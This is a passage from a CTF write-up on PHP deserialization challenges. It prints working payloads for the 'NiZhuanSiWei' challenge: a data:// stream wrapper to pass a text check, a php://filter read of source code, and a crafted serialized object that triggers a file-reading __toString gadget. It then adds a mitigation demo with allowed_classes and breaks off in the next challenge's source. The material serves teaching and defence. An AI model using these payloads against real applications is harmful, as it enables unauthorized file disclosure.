Deserialization CTF challenge summary
buu NiZhuanSiWei
The homepage is a piece of PHP code; auditing it:
There is a file_get_contents() call, so a PHP stream wrapper can be used to supply 'welcome to the zjctf' and pass the check;
There is also a hint pointing at useless.php, which can be read through include()
Build the payload:
?text=data:text/plain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
This returns the base64-encoded source:
Decode and audit:
<?php
class Flag{
    //flag.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
Build the serialized object:
$a=new Flag();
$a->file = 'flag.php' ;
echo serialize($a);
Final payload (note the quotes in the serialized string must be plain ASCII double quotes, not curly ones):
?text=data:text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
The flag is in the page source.
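To see why the chain above works and how it is closed off, here is an added example (not code from the challenge or the original writeup) that reproduces the shape of the Flag gadget locally, then contrasts a plain unserialize() with the allowed_classes mitigation. The file name demo.txt and its content are constructed sample values.

```php
<?php
// Same gadget shape as useless.php: a __toString that reads a file path
// taken from a deserialized property. Added example, not the page's code.
class Flag {
    public $file;
    public function __toString() {
        if (isset($this->file)) {
            // The original calls file_get_contents($this->file); here we only
            // show that attacker-controlled data reached a sensitive sink.
            return "sink reached with path: " . $this->file . "\n";
        }
        return "";
    }
}

// Constructed sample input: what the writeup builds with serialize().
$f = new Flag();
$f->file = 'demo.txt';          // constructed sample value
$payload = serialize($f);       // O:4:"Flag":1:{s:4:"file";s:8:"demo.txt";}

// Vulnerable pattern: the class is instantiated from untrusted data and
// __toString fires as soon as the object is used in a string context
// (string concatenation, echo, or the loose comparison in the challenge).
$obj = unserialize($payload);
echo "unsafe: " . $obj;

// Mitigation: allowed_classes => false turns any object into
// __PHP_Incomplete_Class, whose magic methods never run. (An explicit
// whitelist, e.g. ['allowed_classes' => ['SafeDto']], is the other option.)
$safe = unserialize($payload, ['allowed_classes' => false]);
if ($safe instanceof __PHP_Incomplete_Class) {
    echo "safe: object rejected, gadget did not execute\n";
}
```

For data that only needs to round-trip, json_decode() avoids the object-instantiation problem entirely.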
areuserialz
The challenge hands over the source up front; audit it:
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1"